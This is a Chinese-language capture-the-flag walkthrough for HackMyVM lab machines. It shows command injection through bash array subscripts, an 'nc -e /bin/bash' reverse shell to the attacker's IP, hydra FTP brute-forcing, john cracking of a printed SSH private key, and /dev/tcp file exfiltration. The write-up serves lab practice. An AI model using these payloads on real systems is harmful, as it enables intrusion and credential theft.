2025/03/23 04:08:02 CMD: UID=0 PID=31293 | /bin/bash /opt/create_nc.sh
发现有一个kill_todd.sh,我就说nc怎么一直不稳定,原来是你这家伙,得想办法给他删了,得先看看有没有权限
sudo -l
Matching Defaults entries for todd on todd:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User todd may run the following commands on todd:
(ALL : ALL) NOPASSWD: /bin/bash /srv/guess_and_check.sh
(ALL : ALL) NOPASSWD: /usr/bin/rm
(ALL : ALL) NOPASSWD: /usr/sbin/reboot
发现有rm的权限,那直接把那个脚本删了
┌──(root㉿kali-plus)-[~]
└─# nc 192.168.56.111 7066
cd /opt
ls -al
total 40
drwxr-xr-x 2 root root 4096 Mar 22 10:40 .
drwxr-xr-x 18 root root 4096 Nov 13 2020 ..
-rwx------ 1 root root 138 Mar 22 08:00 create_nc2.sh
-rwx---r-- 1 root root 141 Mar 22 07:42 create_nc.sh
-rwx------ 1 root root 16608 Mar 22 07:21 fake_ssh
-rwx------ 1 root root 17 Mar 22 07:07 kill_todd.sh
sudo rm kill_todd.sh
sudo rm fake_ssh
bash
ls -al
total 16
drwxr-xr-x 2 root root 4096 Mar 23 04:26 .
drwxr-xr-x 18 root root 4096 Nov 13 2020 ..
-rwx------ 1 root root 138 Mar 22 08:00 create_nc2.sh
-rwx---r-- 1 root root 141 Mar 22 07:42 create_nc.sh
cat create_nc.sh
#!/bin/bash
create_ssh(){
sudo -u todd nc -e /opt/fake_ssh -lp $1
}
for i in $(seq 10)
do
a=$((RANDOM))
sleep 0.2
create_ssh $a &
done
发现这个create_nc.sh是利用fake_ssh的,也可以直接删掉,接着把本地的ssh私钥写一份到靶机上看看能不能登录进去
┌──(root㉿kali-plus)-[~/.ssh]
└─# ssh todd@192.168.56.111
The authenticity of host '192.168.56.111 (192.168.56.111)' can't be established.
ED25519 key fingerprint is SHA256:rXcjV9xeZG+J6KZLTr1t2Xi2ErBvMauXjxH4EBvhV0c.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.111' (ED25519) to the list of known hosts.
Linux todd 4.19.0-12-amd64 #1 SMP Debian 4.19.152-1 (2020-10-18) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
$ bash
todd@todd:~$
成功登录进去了
提权-root flag
todd@todd:~$ sudo -l
Matching Defaults entries for todd on todd:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User todd may run the following commands on todd:
(ALL : ALL) NOPASSWD: /bin/bash /srv/guess_and_check.sh
(ALL : ALL) NOPASSWD: /usr/bin/rm
(ALL : ALL) NOPASSWD: /usr/sbin/reboot
todd@todd:~$ cd /srv
todd@todd:/srv$ ls
guess_and_check.sh note.jpg
todd@todd:/srv$ cat note.jpg
u can try bash -x guess_and_check.sh
这里得到一个提示,下面是guess_and_check.sh
#!/bin/bash
cat << EOF
. **
* *.
,*
*,
, ,*
., *,
/ *
,* *,
/. .*.
* **
,* ,*
** *.
** **.
,* **
*, ,*
* **
*, .*
*. **
** ,*,
** *, HackMyVM
EOF
# check this script used by human
a=$((RANDOM%1000))
echo "Please Input [$a]"
echo "[+] Check this script used by human."
echo "[+] Please Input Correct Number:"
read -p ">>>" input_number
[[ $input_number -ne "$a" ]] && exit 1
sleep 0.2
true_file="/tmp/$((RANDOM%1000))"
sleep 1
false_file="/tmp/$((RANDOM%1000))"
[[ -f "$true_file" ]] && [[ ! -f "$false_file" ]] && cat /root/.cred || exit 2
重点在[[ $input_number -ne "$a" ]] && exit 1这一句话,这句话是要对输入的内容与变量a进行比较,当我们输入a的时候,它把我们输入的a 当成一个变量,即两个变量相比较,两个变量相比较一定相等,这样就能绕过,这样以来就存在一个注入点,如果作为变量来处理,那么可以引入一个数组,而且shell支持数组,数组的下标是数字,数组的下标是可以运算的,就是可以在数组下标这个地方注入一些代码
todd@todd:/srv$ sudo /bin/bash /srv/guess_and_check.sh
. **
* *.
,*
*,
, ,*
., *,
/ *
,* *,
/. .*.
* **
,* ,*
** *.
** **.
,* **
*, ,*
* **
*, .*
*. **
** ,*,
** *, HackMyVM
Please Input [365]
[+] Check this script used by human.
[+] Please Input Correct Number:
>>>a[$(id)]
/srv/guess_and_check.sh: line 35: uid=0(root) gid=0(root) groups=0(root): syntax error in expression (error token is "(root) gid=0(root) groups=0(root)")
那么下面可以有多种方案
方法一 直接拿root-shell
todd@todd:/srv$ sudo /bin/bash /srv/guess_and_check.sh
. **
* *.
,*
*,
, ,*
., *,
/ *
,* *,
/. .*.
* **
,* ,*
** *.
** **.
,* **
*, ,*
* **
*, .*
*. **
** ,*,
** *, HackMyVM
Please Input [887]
[+] Check this script used by human.
[+] Please Input Correct Number:
>>>a[`bash >&2`]
root@todd:/srv# id
uid=0(root) gid=0(root) groups=0(root)
方法二-反弹shell
todd@todd:/srv$ sudo /bin/bash /srv/guess_and_check.sh
. **
* *.
,*
*,
, ,*
., *,
/ *
,* *,
/. .*.
* **
,* ,*
** *.
** **.
,* **
*, ,*
* **
*, .*
*. **
** ,*,
** *, HackMyVM
Please Input [720]
[+] Check this script used by human.
[+] Please Input Correct Number:
>>>a[`nc -e /bin/bash 192.168.56.101 1234`]
┌──(root㉿kali-plus)-[~]
└─# nc -lvvp 1234
nc: getnameinfo: Temporary failure in name resolution
nc: getnameinfo: Temporary failure in name resolution
id
uid=0(root) gid=0(root) groups=0(root)
方法三-拿到root的密码
分析一下脚本的最后一段内容
sleep 0.2
true_file="/tmp/$((RANDOM%1000))"
sleep 1
false_file="/tmp/$((RANDOM%1000))"
[[ -f "$true_file" ]] && [[ ! -f "$false_file" ]] && cat /root/.cred || exit 2
有一个true_file和false_file,其中有一个随机值,1000以内,如果随机的true_file存在,并且false_file不存在,则会输出/root/.cred的内容,那么可以在文件夹内生成500个文件,这样就有1/4的概率得到/root/.cred
todd@todd:/tmp$ sudo /bin/bash /srv/guess_and_check.sh
. **
* *.
,*
*,
, ,*
., *,
/ *
,* *,
/. .*.
* **
,* ,*
** *.
** **.
,* **
*, ,*
* **
*, .*
*. **
** ,*,
** *, HackMyVM
Please Input [781]
[+] Check this script used by human.
[+] Please Input Correct Number:
>>>781
fake password
这样是手动输入的,有1/4的概率拿到这个密码,没错这个fake password就是密码,但是这是手动输入的有点慢,可以使用for i in $(seq 5);do echo '*' | sudo /bin/bash /srv/guess_and_check.sh ;done
todd@todd:/tmp$ for i in $(seq 5);do echo '*' | sudo /bin/bash /srv/guess_and_check.sh ;done
. **
* *.
,*
*,
, ,*
., *,
/ *
,* *,
/. .*.
* **
,* ,*
** *.
** **.
,* **
*, ,*
* **
*, .*
*. **
** ,*,
** *, HackMyVM
Please Input [662]
[+] Check this script used by human.
[+] Please Input Correct Number:
/srv/guess_and_check.sh: line 35: [[: *: syntax error: operand expected (error token is "*")
fake password
. **
* *.
,*
*,
, ,*
., *,
/ *
,* *,
/. .*.
* **
,* ,*
** *.
** **.
,* **
*, ,*
* **
*, .*
*. **
** ,*,
** *, HackMyVM
Please Input [829]
[+] Check this script used by human.
[+] Please Input Correct Number:
/srv/guess_and_check.sh: line 35: [[: *: syntax error: operand expected (error token is "*")
. **
* *.
,*
*,
, ,*
., *,
/ *
,* *,
/. .*.
* **
,* ,*
** *.
** **.
,* **
*, ,*
* **
*, .*
*. **
** ,*,
** *, HackMyVM
Please Input [180]
[+] Check this script used by human.
[+] Please Input Correct Number:
/srv/guess_and_check.sh: line 35: [[: *: syntax error: operand expected (error token is "*")
. **
* *.
,*
*,
, ,*
., *,
/ *
,* *,
/. .*.
* **
,* ,*
** *.
** **.
,* **
*, ,*
* **
*, .*
*. **
** ,*,
** *, HackMyVM
Please Input [572]
[+] Check this script used by human.
[+] Please Input Correct Number:
/srv/guess_and_check.sh: line 35: [[: *: syntax error: operand expected (error token is "*")
. **
* *.
,*
*,
, ,*
., *,
/ *
,* *,
/. .*.
* **
,* ,*
** *.
** **.
,* **
*, ,*
* **
*, .*
*. **
** ,*,
** *, HackMyVM
Please Input [908]
[+] Check this script used by human.
[+] Please Input Correct Number:
/srv/guess_and_check.sh: line 35: [[: *: syntax error: operand expected (error token is "*")
也可以用for i in $(seq 5);do echo 'a' | sudo /bin/bash /srv/guess_and_check.sh ;done
或者for i in $(seq 5);do echo 'a' | sudo /bin/bash /srv/guess_and_check.sh|grep 'Correct Number' -A 1;done
todd@todd:/tmp$ for i in $(seq 5);do echo 'a' | sudo /bin/bash /srv/guess_and_check.sh|grep 'Correct Number' -A 1;done
[+] Please Input Correct Number:
[+] Please Input Correct Number:
fake password
[+] Please Input Correct Number:
[+] Please Input Correct Number:
[+] Please Input Correct Number:
fake password
todd@todd:/tmp$ su - root
Password:
root@todd:~# id
uid=0(root) gid=0(root) groups=0(root)
root@todd:~# ls
root.txt
root@todd:~# cat root.txt
Todd{389c9909b8d6a701217a45104de7aa21}
Chromee
信息搜集
ip地址为192.168.56.112,接着对端口进行信息搜集
┌──(root㉿kali-plus)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:1d:89:b5, IPv4: 192.168.56.101
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:17 (Unknown: locally administered)
192.168.56.100 08:00:27:99:57:5b PCS Systemtechnik GmbH
192.168.56.112 08:00:27:a5:6f:25 PCS Systemtechnik GmbH
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.043 seconds (125.31 hosts/sec). 3 responded
┌──(root㉿kali-plus)-[~]
└─# nmap 192.168.56.112 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-28 19:46 CST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.112
Host is up (0.0034s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8080/tcp open http-proxy
23333/tcp open elxmgmt
MAC Address: 08:00:27:A5:6F:25 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 13.84 seconds
┌──(root㉿kali-plus)-[~]
└─# nmap -sV -sT 192.168.56.112 -p 8080,23333
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-28 19:47 CST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.112
Host is up (0.0011s latency).
PORT STATE SERVICE VERSION
8080/tcp open http Apache httpd 2.4.56 ((Debian))
23333/tcp open ftp vsftpd 3.0.3
MAC Address: 08:00:27:A5:6F:25 (Oracle VirtualBox virtual NIC)
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.54 seconds
发现22,80,8080和23333端口是开放的,先看看80和8080端口的情况
┌──(root㉿kali-plus)-[~]
└─# curl http://192.168.56.112:80
<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>primary</title>
<style>
/* 基础重置与字体 */
* {
margin: 0;
padding: 0;
box-sizing: border-box;
font-family: 'Segoe UI', system-ui, sans-serif;
}
/* 渐变背景与整体布局 */
body {
background: linear-gradient(135deg, #f5f7fa 0%, #c3cfe2 100%);
line-height: 1.6;
color: #333;
}
/* 导航栏样式 */
.navbar {
background: rgba(255, 255, 255, 0.95);
padding: 1rem 2rem;
box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1);
position: fixed;
width: 100%;
top: 0;
z-index: 1000;
}
.nav-links {
display: flex;
justify-content: space-between;
align-items: center;
max-width: 1200px;
margin: 0 auto;
}
.logo {
font-size: 1.8rem;
font-weight: 700;
color: #2c3e50;
text-decoration: none;
transition: color 0.3s ease;
}
.logo:hover {
color: #3498db;
}
/* 主体内容容器 */
.container {
max-width: 1200px;
margin: 100px auto 40px;
padding: 0 20px;
}
/* 英雄区域 */
.hero {
text-align: center;
padding: 6rem 0;
background: linear-gradient(45deg, #6a11cb 0%, #2575fc 100%);
color: white;
border-radius: 15px;
margin-bottom: 3rem;
box-shadow: 0 10px 20px rgba(0, 0, 0, 0.2);
}
.hero h1 {
font-size: 3.5rem;
margin-bottom: 1.5rem;
text-shadow: 2px 2px 4px rgba(0, 0, 0, 0.3);
}
/* 卡片布局 */
.card-container {
display: grid;
grid-template-columns: repeat(auto-fit, minmax(300px, 1fr));
gap: 2rem;
padding: 2rem 0;
}
.card {
background: white;
padding: 2rem;
border-radius: 12px;
transition: transform 0.3s ease;
box-shadow: 0 5px 15px rgba(0, 0, 0, 0.1);
}
.card:hover {
transform: translateY(-10px);
}
.card h3 {
color: #2c3e50;
margin-bottom: 1rem;
font-size: 1.5rem;
}
/* 按钮样式 */
.btn {
display: inline-block;
padding: 1rem 2rem;
background: #3498db;
color: white;
text-decoration: none;
border-radius: 25px;
transition: all 0.3s ease;
margin-top: 1rem;
}
.btn:hover {
background: #2980b9;
transform: translateY(-2px);
box-shadow: 0 5px 15px rgba(52, 152, 219, 0.4);
}
/* 响应式设计 */
@media (max-width: 768px) {
.hero h1 {
font-size: 2.5rem;
}
.card-container {
grid-template-columns: 1fr;
}
}
</style>
</head>
<body>
<nav class="navbar">
<div class="nav-links">
<a href="#" class="logo">ModernUI</a>
<div>
<a href="#" class="btn">立即体验</a>
</div>
</div>
</nav>
<div class="container">
<section class="hero">
<h1>创造非凡体验</h1>
<p>用创新设计打造卓越数字产品</p>
<a href="#" class="btn" style="margin-top: 2rem;">了解更多</a>
</section>
<div class="card-container">
<article class="card">
<h3>响应式设计</h3>
<p>完美适配各种设备屏幕尺寸,提供一致的用户体验</p>
</article>
<article class="card">
<h3>现代交互</h3>
<p>流畅的动画与直观的操作,提升用户参与度</p>
</article>
<article class="card">
<h3>高效性能</h3>
<p>优化代码结构,确保快速加载与流畅运行</p>
</article>
</div>
</div>
</body>
</html>
┌──(root㉿kali-plus)-[~]
└─# curl http://192.168.56.112:8080
<h2>You may need to bypass!</h2>
接着使用gobuster进行目录扫描,发现一个/post.php和一个/secret.php,访问/secret.php之后下载了一个php文件
┌──(root㉿kali-plus)-[~]
└─# gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.56.112/ -x.txt,.php,.zip
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.112/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: txt,php,zip
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/post.php (Status: 200) [Size: 3]
/secret.php (Status: 200) [Size: 549]
Progress: 558124 / 882240 (63.26%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 558313 / 882240 (63.28%)
===============================================================
Finished
===============================================================
┌──(root㉿kali-plus)-[~]
└─# gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.56.112:8080/ -x.txt,.php,.zip
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.112:8080/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,zip,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/javascript (Status: 301) [Size: 328] [--> http://192.168.56.112:8080/javascript/]
/silence (Status: 403) [Size: 281]
/server-status (Status: 403) [Size: 281]
Progress: 882236 / 882240 (100.00%)
===============================================================
Finished
===============================================================
<!DOCTYPE html>
<html>
<head>
<title>Secret</title>
</head>
<body>
<?php
$greeting = date('H') < 12 ? '早上好' : (date('H') < 18 ? '下午好' : '晚上好');
$visitorIP = htmlspecialchars($_SERVER['REMOTE_ADDR']);
echo "<h1>{$greeting},adriana</h1>";
echo "<p>当前时间:" . date('Y-m-d H:i:s') . "</p>";
echo "<p>你的IP:{$visitorIP}</p>";
if (isset($_GET['aaa'])) {
$file_content = file_get_contents('/opt/note/dic.txt');
echo $file_content;
} else {
die();
}
?>
</body>
</html>
user flag
访问/server的时候显示403,换了一种请求方式发现变成301,在后面加个/index.html发现访问成功,并且得到一个邮箱地址,有用的应该是这个chromee.hmv,写到hosts文件里,再去访问http://chromee.hmv/secret.php
Silence
We are working to improve our website.
contact: support@chromee.hmv
此时发现secret.php被解析了,尝试传入参数,貌似不管输入什么参数,都是回显
下午好,adriana
当前时间:2025-03-28 13:57:34
你的IP:192.168.56.101
The Lost Key Lily, a curious girl, found an old rusty key in the woods. Wondering where it belonged, she asked everyone in the village, but no one knew. One day, she discovered a locked stone well. To her surprise, the key fit. She opened it and descended into a hidden passage. There, she found an ancient chest filled with treasures. But the real treasure was a note inside: “The greatest treasure is the journey, not the prize.” Lily smiled, realizing the adventure was the real reward.
这里出现2个人名,adriana和Lily,使用cupp生成2个字典,把他放到一个文件中,然后对23333端口进行爆破
┌──(root㉿kali-plus)-[~]
└─# hydra -l adriana -P chromee.txt ftp://192.168.56.112:23333 -t 10
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-28 21:26:33
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 10 tasks per 1 server, overall 10 tasks, 163 login tries (l:1/p:163), ~17 tries per task
[DATA] attacking ftp://192.168.56.112:23333/
[23333][ftp] host: 192.168.56.112 login: adriana password: Lily2020
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-03-28 21:26:46
得到密码,这里我是猜测adriana是用户名的,得到密码直接连进去看看,连接进去就是一顿搜索,找到2个用户名,还找到一个zeus.conf
ftp> cd home
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||49606|)
150 Here comes the directory listing.
drwxr-x--- 4 1000 1000 4096 Mar 09 07:59 follower
drwxr-x--- 3 1001 1001 4096 Mar 07 12:39 softly
226 Directory send OK.
lftp adriana@192.168.56.112:/srv> cat zeus.conf
permit follower as softly cmd /usr/local/bin/wfuzz
permit nopass :softly as root cmd /usr/bin/chromium
permit nopass :softly as root cmd /usr/bin/kill
ftp好难用,不支持cat命令,使用lftp连上去,有一个...的文件
┌──(root㉿kali-plus)-[~]
└─# lftp 192.168.56.112 -u adriana -p 23333
密码:
lftp adriana@192.168.56.112:~> ls
-rw-r--r-- 1 0 0 495 Mar 07 14:40 dic.txt
lftp adriana@192.168.56.112:~> ls -al
drwxr-xr-x 2 106 115 4096 Mar 09 08:13 .
drwxr-xr-x 4 0 0 4096 Mar 09 08:12 ..
-rw-r--r-- 1 0 0 3414 Mar 09 08:13 ...
-rw-r--r-- 1 0 0 495 Mar 07 14:40 dic.txt
lftp adriana@192.168.56.112:~> cat ...
-----BEGIN OPENSSH PRIVATE KEY-----
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
SG3w==
-----END OPENSSH PRIVATE KEY-----
3414 bytes transferred
发现是密钥,拿到本地给他爆破一下
┌──(root㉿kali-plus)-[~]
└─# john tmp --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 24 for all loaded hashes
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
cassandra (id3)
1g 0:00:00:10 DONE (2025-03-28 22:01) 0.09680g/s 99.12p/s 99.12c/s 99.12C/s hawaii..bethany
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(root㉿kali-plus)-[~]
└─# john tmp --show
id3:cassandra
1 password hash cracked, 0 left
得到密码cassandra,一共就得到2个用户,一个一个试试,看哪个能连上去
┌──(root㉿kali-plus)-[~]
└─# ssh follower@192.168.56.112 -i id3
Enter passphrase for key 'id3':
follower@Chromee:~$ ls
cat.gif note.txt
follower@Chromee:~$ cat note.txt
Think about rotations and the cat’s secrets.
47 is not just a number, it's a twist of fate.
这里也得到一个提示,还有一个gif图片,使用nc的方式把这个图片弹到kali中
cat cat.gif >/dev/tcp/192.168.56.101/1234
nc -lp 1234 > cat.gif
既然是gif,那试试帧分离,发现不是gif帧分离,看一下exif信息
┌──(root㉿kali-plus)-[~/hmv/chromee]
└─# exiftool cat.gif
ExifTool Version Number : 12.76
File Name : cat.gif
Directory : .
File Size : 3.5 MB
File Modification Date/Time : 2025:03:28 22:23:24+08:00
File Access Date/Time : 2025:03:28 22:24:09+08:00
File Inode Change Date/Time : 2025:03:28 22:23:24+08:00
File Permissions : -rw-r--r--
File Type : GIF
File Type Extension : gif
MIME Type : image/gif
GIF Version : 89a
Image Width : 640
Image Height : 640
Has Color Map : Yes
Color Resolution Depth : 8
Bits Per Pixel : 8
Background Color : 0
Animation Iterations : Infinite
Comment : Imagemagick Convert Timeline
Profile CMM Type :
Profile Version : 4.3.0
Profile Class : Display Device Profile
Color Space Data : RGB
Profile Connection Space : XYZ
Profile Date Time : 2016:01:01 00:00:00
Profile File Signature : acsp
Primary Platform : Unknown ()
CMM Flags : Not Embedded, Independent
Device Manufacturer :
Device Model :
Device Attributes : Reflective, Glossy, Positive, Color
Rendering Intent : Media-Relative Colorimetric
Connection Space Illuminant : 0.9642 1 0.82491
Profile Creator :
Profile ID : 0
Profile Description : sRGB
Red Matrix Column : 0.43607 0.22249 0.01392
Green Matrix Column : 0.38515 0.71687 0.09708
Blue Matrix Column : 0.14307 0.06061 0.7141
Media White Point : 0.9642 1 0.82491
Red Tone Reproduction Curve : (Binary data 40 bytes, use -b option to extract)
Green Tone Reproduction Curve : (Binary data 40 bytes, use -b option to extract)
Blue Tone Reproduction Curve : (Binary data 40 bytes, use -b option to extract)
Profile Copyright : Google Inc. 2016
Frame Count : 13
Duration : 6.31 s
Image Size : 640x640
Megapixels : 0.410
Comment: Imagemagick Convert Timeline发现这个,直接去搜一下看看有没有相关文章,找到一篇
https://www.cnblogs.com/chtxrt/p/17280677.html 先使用identify对图片进行分析
┌──(root㉿kali-plus)-[~/hmv/chromee]
└─# identify cat.gif
cat.gif[0] GIF 640x640 640x640+0+0 8-bit sRGB 256c 0.010u 0:00.003
cat.gif[1] GIF 640x640 640x640+0+0 8-bit sRGB 256c 0.010u 0:00.004
cat.gif[2] GIF 640x640 640x640+0+0 8-bit sRGB 256c 0.010u 0:00.003
cat.gif[3] GIF 640x640 640x640+0+0 8-bit sRGB 256c 0.010u 0:00.003
